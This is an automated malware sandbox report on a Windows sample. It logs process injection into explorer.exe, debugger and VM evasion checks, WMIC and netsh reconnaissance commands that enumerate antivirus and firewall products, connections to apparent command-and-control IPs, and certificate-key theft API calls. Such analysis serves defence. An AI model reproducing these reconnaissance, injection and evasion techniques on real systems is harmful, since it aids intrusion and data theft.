                Source: C:\Windows\explorer.exe TID: 6924Thread sleep time: -109400s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6896Thread sleep count: 805 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6896Thread sleep time: -80500s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6348Thread sleep count: 297 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6420Thread sleep count: 379 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6420Thread sleep time: -37900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6272Thread sleep count: 339 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6272Thread sleep time: -33900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6924Thread sleep count: 3425 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6924Thread sleep time: -342500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2516Thread sleep count: 2504 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2516Thread sleep time: -2504000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3352Thread sleep count: 2061 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3352Thread sleep time: -2061000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4280Thread sleep count: 3660 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4280Thread sleep time: -3660000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2176Thread sleep count: 3567 > 30
                Source: C:\Windows\explorer.exe TID: 2176Thread sleep time: -3567000s >= -30000s
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,10_2_00007FF6AAB4FB4C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00E02B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00E01D4A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00E03ED9
                Source: C:\Windows\explorer.exeCode function: 14_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,14_2_001D30A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E06512 GetSystemInfo,13_2_00E06512
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: explorer.exe, 00000001.00000000.1726737845.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 00000001.00000000.1726737845.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.1726737845.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW zX
                Source: BC8F.exe, 0000000A.00000002.4140670526.0000020326C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 1029732313311351031029732313\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: nk4AVBRUTsuPtvZ\r\nSystem Model: OSCwbcDf\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ZS6MC RA31Y, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'850 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'114 MB\r\nVirtual Memory: In Use: 1'077 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: ncU69\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1029732313311351031029732313\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AhLewOCEgkiOocFnIHMtkWqsfmQgkIXKWToQTXwVRDBzHhOPCWFbvoAByIeTjtDma\CGowyuvjVXoVkgbh.exe,5812
                Source: explorer.exe, 00000001.00000000.1726737845.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: BC8F.exe, 0000000A.00000002.4139823391.0000020326C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000001.00000000.1726201886.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: ROUTE.EXE, 00000026.00000002.3633007494.00000237F7469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\veEGy9FijY.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,15_2_00B41B17
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00B41016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00B41016
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF6AAB43220
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_025B092B mov eax, dword ptr fs:[00000030h]0_2_025B092B
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_025B0D90 mov eax, dword ptr fs:[00000030h]0_2_025B0D90
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0277F6DE push dword ptr fs:[00000030h]0_2_0277F6DE
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_025B092B mov eax, dword ptr fs:[00000030h]5_2_025B092B
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_025B0D90 mov eax, dword ptr fs:[00000030h]5_2_025B0D90
                Source: C:\Users\user\AppData\Roaming\haevsidCode function: 5_2_0274EB16 push dword ptr fs:[00000030h]5_2_0274EB16
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_0061092B mov eax, dword ptr fs:[00000030h]7_2_0061092B
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_00610D90 mov eax, dword ptr fs:[00000030h]7_2_00610D90
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeCode function: 7_2_008504D3 push dword ptr fs:[00000030h]7_2_008504D3
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_005D092B mov eax, dword ptr fs:[00000030h]9_2_005D092B
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_005D0D90 mov eax, dword ptr fs:[00000030h]9_2_005D0D90
                Source: C:\Users\user\AppData\Roaming\uievsidCode function: 9_2_006C0093 push dword ptr fs:[00000030h]9_2_006C0093
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB425B4 GetProcessHeap,RtlFreeHeap,10_2_00007FF6AAB425B4

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: 38E5.exe.1.drJump to dropped file
                Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeThread created: C:\Windows\explorer.exe EIP: 13919A8Jump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidThread created: unknown EIP: 33C19A8Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeThread created: unknown EIP: 31D1970Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidThread created: unknown EIP: 8D81970Jump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidThread created: unknown EIP: 8B719A8
                Source: C:\Windows\explorer.exeMemory written: PID: 6072 base: FF79C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 4116 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6112 base: FF79C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 412 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 1340 base: FF79C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 1784 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe17_2_00A310A5
                Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe17_2_00A31016
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                Source: explorer.exe, 00000001.00000000.1724415447.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.1722816666.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E555EB cpuid 13_2_00E555EB
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB49224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,10_2_00007FF6AAB49224
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,13_2_00E02198
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: BC8F.exe, 0000000A.00000002.4140670526.0000020326C49000.00000004.00000020.00020000.00000000.sdmp, BC8F.exe, 0000000A.00000003.3011703244.0000020326C1D000.00000004.00000020.00020000.00000000.sdmp, BC8F.exe, 0000000A.00000003.3011303958.0000020326C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
                Source: Yara matchFile source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
